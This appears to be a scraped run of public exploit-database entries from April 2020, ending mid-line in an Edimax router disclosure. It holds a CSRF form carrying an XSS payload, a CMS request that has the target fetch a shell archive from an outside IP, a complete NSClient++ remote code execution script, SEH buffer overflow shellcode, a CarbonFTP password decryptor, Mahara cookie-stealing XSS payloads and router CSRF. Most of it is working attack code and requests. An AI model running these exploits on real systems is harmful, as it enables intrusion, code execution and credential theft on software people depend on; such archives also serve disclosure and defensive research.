<!-- XSS modify labels: the lab4 value is stored and rendered back unencoded -->
<html>
<body>
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
-
jizhi CMS 1.6.7 - Arbitrary File Download
# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download # Google Dork: jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Vendor Homepage: https://www.jizhicms.cn/ # Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip # Version: 1.6.7 # Tested on: Mac OS # CVE : N/A Data 1. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 86 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip Data 2. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 32 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=file-upzip&filepath=shell
-
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System by
# default, this leads to privileged code execution.
#
# Defender notes (everything below is visible in the code): the sequence is
# GET /auth/token?password=..., GET /registry/control/module/load?name=CheckExternalScripts,
# POST /settings/query.json (an update under "/settings/external scripts/scripts"
# followed by a SAVE control), GET /core/reload, then GET /query/<8-13 random letters>.
# Those endpoints, in that order, are the audit-log pattern to alert on; the
# password travels in the query string, so it also lands in any request log.

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs  # imported but never used
import urllib3
import json
import sys
import random
import string
import time
import argparse

# Every request below is sent with verify=False, so TLS certificate errors
# are silenced here rather than surfaced.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def generateName() -> str:
    """Return a random name of 8 to 13 ASCII letters (randint bounds are inclusive)."""
    letters = string.ascii_lowercase + string.ascii_uppercase
    return ''.join(random.choice(letters) for i in range(random.randint(8,13)))


def printStatus(message: str, msg_type: str) -> None:
    """Print message with a coloured [+] / [!] / [-] prefix for "good" / "info" / "bad".

    The local named ``string`` shadows the ``string`` module inside this
    function, and any msg_type other than the three handled ones leaves it
    unassigned, so the final print() raises UnboundLocalError.
    """
    C_YELLOW = '\033[1;33m'
    C_RESET = '\033[0m'
    C_GREEN = '\033[1;32m'
    C_RED = '\033[1;31m'
    if msg_type == "good":
        green_plus = C_GREEN + "[+]" + C_RESET
        string = green_plus + " " + message
    elif msg_type == "info":
        yellow_ex = C_YELLOW + "[!]" + C_RESET
        string = yellow_ex + " " + message
    elif msg_type == "bad":
        red_minus = C_RED + "[-]" + C_RESET
        string = red_minus + " " + message
    print(string)


# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session, cmd: str, key: str) -> None:
    """Register cmd as external script ``key`` via /settings/query.json, then issue SAVE.

    Exits with status 1 if the first response lacks "STATUS_OK"; the SAVE
    response is not checked.  Uses the module-level base_url.
    """
    printStatus("Configuring Script with Specified Payload . . .", "info")
    endpoint = "/settings/query.json"
    node = { "path" : "/settings/external scripts/scripts", "key" : key }
    value = { "string_data" : cmd }
    update = { "node" : node , "value" : value }
    payload = [ { "plugin_id" : "1234", "update" : update } ]
    json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
    out = session.post(url = base_url + endpoint, json=json_data, verify=False)
    if "STATUS_OK" not in str(out.content):
        printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
        sys.exit(1)
    printStatus("Added External Script (name: " + key + ")", "good")
    time.sleep(3)
    printStatus("Saving Configuration . . .", "info")
    header = { "version" : "1" }
    payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
    json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
    session.post(url = base_url + endpoint, json=json_data, verify=False)


# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session) -> None:
    """Call /core/reload, sleep 10 s, then poll base_url until a non-empty body arrives.

    Only exceptions are counted towards the 10-attempt limit; there is no
    sleep inside the loop, so an immediate empty reply would spin without
    delay and without ever incrementing count.  The bare except also hides
    the reason for each failed attempt.
    """
    printStatus("Reloading Application . . .", "info")
    endpoint = "/core/reload"
    session.get(url = base_url + endpoint, verify=False)
    # Wait until the application successfully reloads by making a request
    # every 10 seconds until it responds.
    printStatus("Waiting for Application to reload . . .", "info")
    time.sleep(10)
    response = False
    count = 0
    while not response:
        try:
            out = session.get(url = base_url, verify=False, timeout=10)
            if len(out.content) > 0:
                response = True
        except:
            count += 1
            if count > 10:
                printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
                sys.exit(1)
            else:
                continue


# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key: str) -> None:
    """GET /query/<key>; a read timeout is treated as success and exits 0."""
    printStatus("Triggering payload, should execute shortly . . .", "info")
    endpoint = "/query/" + key
    try:
        session.get(url = base_url + endpoint, verify=False, timeout=10)
    except requests.exceptions.ReadTimeout:
        printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
        sys.exit(0)


# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session) -> None:
    """Load the CheckExternalScripts module; exits 1 unless the reply contains "STATUS_OK"."""
    printStatus("Enabling External Scripts Module . . .", "info")
    endpoint = "/registry/control/module/load"
    params = { "name" : "CheckExternalScripts" }
    out = session.get(url = base_url + endpoint, params=params, verify=False)
    if "STATUS_OK" not in str(out.content):
        printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
        sys.exit(1)


# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session) -> str:
    """Return the "auth token" field from /auth/token, or exit 1.

    The module-level password is sent as a query-string parameter.
    """
    printStatus("Obtaining Authentication Token . . .", "info")
    endpoint = "/auth/token"
    params = { "password" : password }
    auth = session.get(url = base_url + endpoint, params=params, verify=False)
    if "auth token" in str(auth.content):
        j = json.loads(auth.content)
        authToken = j["auth token"]
        printStatus("Got auth token: " + authToken, "good")
        return authToken
    else:
        printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
        sys.exit(1)


parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()

# Only the raw argv length is checked, not that every option was supplied;
# a missing -t or -P leaves args.t / args.P as None and the base_url
# concatenation below raises TypeError.
if len(sys.argv) < 4:
    parser.print_help()
    sys.exit(1)

# Build base URL, grab needed arguments (read as globals by the functions above)
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c

# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})

# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)

# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})

# Execute our code.
triggerPayload(s, randKey)
RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) # Date: 2020-04-20 # Author: Felipe Winsnes # Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe # Version: 3.1.3.2.2010.06.13 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open 'RmDownloader.exe' # 4.- Go to 'Load' tab # 5.- Paste clipboard in 'Load' parameter # 6.- Click on button 'OK' # 7.- Two messageboxes regarding the length of the payload will pop up, click OK # 8.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" buf += 
b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" buf += b"\x50\x65\x67\x70\x41\x41" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll) buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close()
Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption # Date: 2020-04-20 # Author: hyp3rlinx # Vendor: # CVE: CVE-2020-6857 import time, string, sys, argparse, os, codecs #Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version. #This should be compatible for Python 2 and 3 versions now, tested successfully. #Sample test password #LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program. chunk_sz=5 #number of bytes we must decrypt the password by. #Password is stored here: #C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP #Neowise CarbonFTP v1.4 #Insecure Proprietary Password Encryption #By John Page (aka hyp3rlinx) #Apparition Security #=================================================== def carbonftp_conf(conf_file): p="" pipe=-1 passwd="" lst_of_passwds=[] try: for p in conf_file: idx = p.find("Password=STRING|") if idx != -1: pipe = p.find("|") if pipe != -1: passwd = p[pipe + 2: -2] print(" Password found: "+ passwd) lst_of_passwds.append(passwd) except Exception as e: print(str(e)) return lst_of_passwds def reorder(lst): k=1 j=0 for n in range(len(lst)): k+=1 j+=1 try: tmp = lst[n+k] a = lst[n+j] lst[n+j] = tmp lst[n+k] = a except Exception as e: pass return ''.join(lst) def dec2hex(dec): tmp = str(hex(int(dec))) return str(tmp[2:]) #Updated for Python version compatibility. def hex2ascii(h): h=h.strip() passwd="" try: passwd = codecs.decode(h, "hex").decode("ascii") except Exception as e: print("[!] 
In hex2ascii(), not a valid hex string.") exit() return passwd def chunk_passwd(passwd_lst): lst = [] for passwd in passwd_lst: while passwd: lst.append(passwd[:chunk_sz]) passwd = passwd[chunk_sz:] return lst def strip_non_printable_char(str): return ''.join([x for x in str if ord(x) > 31 or ord(x)==9]) cnt = 0 passwd_str="" def deob(c): global cnt, passwd_str tmp="" try: tmp = int(c) - int(key, 16) tmp = dec2hex(tmp) except Exception as e: print("[!] Not a valid CarbonFTP encrypted password.") exit() b="" a="" #Seems we can delete the second char as its most always junk. if cnt!=1: a = tmp[:2] cnt+=1 else: b = tmp[:4] passwd_str += strip_non_printable_char(hex2ascii(a + b)) hex_passwd_lst = list(passwd_str) return hex_passwd_lst def no_unique_chars(lst): c=0 k=1 j=0 for i in range(len(lst)): k+=1 j+=1 try: a = lst[i] b = lst[i+1] if a != b: c+=1 elif c==0: print("[!] Possible one char password?: " +str(lst[0])) return lst[0] except Exception as e: pass return False def decryptor(result_lst): global passwd_str, sz print(" Decrypting ... \n") for i in result_lst: print("[-] "+i) time.sleep(0.1) lst = deob(i) #Re-order chars to correct sequence using custom swap function (reorder). reordered_pass = reorder(lst) sz = len(reordered_pass) #Flag possible single char password. no_unique_chars(lst) print("[+] PASSWORD LENGTH: " + str(sz)) if sz == 9: return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass) #Shorter passwords less then nine chars will have several candidates #as they get padded with repeating chars so we return those. 
passwd_str="" return reordered_pass def display_cracked_passwd(sz, passwd): if sz==9: print("[*] PASSWORD CANDIDATES: "+ passwd + "\n") else: print("[*] DECRYPTED PASSWORD: "+passwd + "\n") def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files") parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password") return parser.parse_args() def main(args): global passwd_str, sz victim="" if args.user and args.encrypted_password: print("[!] Supply a victims username -u or single encrypted password -p, not both.") exit() print("[+] Neowise CarbonFTP v1.4") time.sleep(0.1) print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption") time.sleep(0.1) print("[+] Version 2 Exploit fixed for Python 3 compatibility") time.sleep(0.1) print("[+] Discovered and cracked by hyp3rlinx") time.sleep(0.1) print("[+] ApparitionSec\n") time.sleep(1) #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag. if args.user: victim = args.user os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/") dir_lst = os.listdir(".") for c in dir_lst: f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r") #Get encrypted password from conf file passwd_enc = carbonftp_conf(f) #Break up into 5 byte chunks as processed by the proprietary decryption routine. result_lst = chunk_passwd(passwd_enc) #Decrypt the 5 byte chunks and reassemble to the cleartext password. cracked_passwd = decryptor(result_lst) #Print cracked password or candidates. display_cracked_passwd(sz, cracked_passwd) time.sleep(0.3) passwd_str="" f.close() #Crack a single password -p flag. if args.encrypted_password: passwd_to_crack_lst = [] passwd_to_crack_lst.append(args.encrypted_password) result = chunk_passwd(passwd_to_crack_lst) #Print cracked password or candidates. 
cracked_passwd = decryptor(result) display_cracked_passwd(sz, cracked_passwd) if __name__=="__main__": parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) exit() main(parse_args())
Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-21 # Vendor: https://mahara.org # Software Link: https://launchpad.net/mahara # CVE: N/A Document Title: =============== Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2217 Release Date: ============= 2020-04-21 Common Vulnerability Scoring System: ==================================== 4.3 Affected Product(s): ==================== Catalyst IT Ltd. Product: Mahara v19.10.2 - CMS (Web-Application) https://launchpad.net/mahara & https://mahara.org Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Mahara v19.10.2 CMS web-application series. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side. The persistent vulnerability is located in the `nombre` and `descripción` parameters of the `Ficheros` module in the `groupfiles.php` file. Remote attackers with low privileges are able to inject their own malicious persistent script code as file and folder names. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application side. Files can be reviewed in the backend by higher-privileged accounts and can be shared. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.
Request Method(s): [+] POST Vulnerable Module(s): [+] Ficheros (Files Manager) Vulnerable Input(s): [+] Crear Carpeta Vulnerable File(s): [+] groupfiles.php Vulnerable Parameter(s): [+] nombre [+] descripción Affected Module(s): [+] Página principal Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by a low-privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the web-application and log in as a regular user 2. Move inside the mygroup management 3. Open the ficheros tab on top 4. Inject the test payload into the crear carpeta (Nombre & Descripción) input field for the página principal to output Note: The execution point occurs on edit, list and delete interaction 5. The created path listings are available to higher-privileged user accounts that review them (backend) 6. Successful reproduction of the persistent cross site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) <tr id="file:7191" class="file-item folder no-hover ui-droppable"> <td class="icon-cell"> <div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191" tabindex="0"> <span class="sr-only">Seleccionar y arrastrar para mover >"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> <span class="icon-folder-open icon icon-lg " role="presentation" aria-hidden="true"></span> </div></td> <td class="filename"> <a href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27" id="changefolder:7191" class="inner-link changefolder"> <span class="sr-only">Carpeta:</span> <span class="display-title ">>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> </a></td> <td class="filedescription d-none d-md-table-cell"> >"<iframe></iframe> >"<iframe></iframe></td> <td class="filesize"></td> <td class="filedate">20/04/2020</td> <!-- Ensure space for 3 buttons (in the case of a really long single line string in a user input field --> <td class="text-right control-buttons "> <div class="btn-group"> ... ... 
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-pencil-alt icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Edit folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span></button> <button name="files_filebrowser_delete[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-trash-alt text-danger icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Delete folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span> </button></div></td> --- PoC Session Logs [POST] --- (Mygroup Ficheros) https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------98107146915324237501974151621 Content-Length: 4879 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& 
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& files_filebrowser_edit_title=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& files_filebrowser_edit_licensor=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on& files_filebrowser_update[7191]=Guardar cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 - POST: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2- https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= - Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; 
boundary=---------------------------126319663526561351602937008964 Content-Length: 3721 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 - GET: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2 Reference(s): https://mahara_cms.localhost:8080/artefact/ https://mahara_cms.localhost:8080/artefact/file/ https://mahara_cms.localhost:8080/artefact/file/groupfiles.php Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version CSRF PoC - Mac Filtering ---------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://172.20.10.2/goform/formWlAc" method="POST"> <input type="hidden" name="wlanAcEnabled" value="ON" /> <input type="hidden" name="tiny_idx" value="0" /> <input type="hidden" name="mac" value="ccbbbbbbbbbb" /> <input type="hidden" name="comment" value="PentesterTraining" /> <input type="hidden" name="addFilterMac" value="Add" /> <input type="hidden" name="submit-url" value="/macfilter1_sub1.asp" /> <input type="hidden" name="wlanSSIDIndex" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> -- Besim ALTINOK *Security Engineer*
Edimax EW-7438RPn - Information Disclosure (WiFi Password)
# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ----------------------------- Here step by step : 1. I did Setup 2. After setup try to access to *wlencrypt_wiz.asp* file 3. After access to this file, I saw some information disclosure (Like *WiFi Password*) 4. Here is the all leak here: ------------------------------- <SCRIPT> var _DATE_="Mon Sep 24 19:38:17 CST 2012"; var _VERSION_="1.13"; var _MODEL_="EW7438RPN"; var _MODE_="Edimax"; var _PLATFORM_="RTL8196CS_1200"; var _HW_LED_WPS_="4"; var _HW_LED_POWER_="6"; var _HW_LED_WIRELESS_="2"; var _HW_BUTTON_RESET_="5"; var _HW_BUTTON_WPS_="1"; var _HW_BUTTON_SWITCH_="3"; var _HW_LED_USB_="17"; var _WIRELESS_IGMPSNOOP_="y"; var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y"; var _RDISC_="y"; var 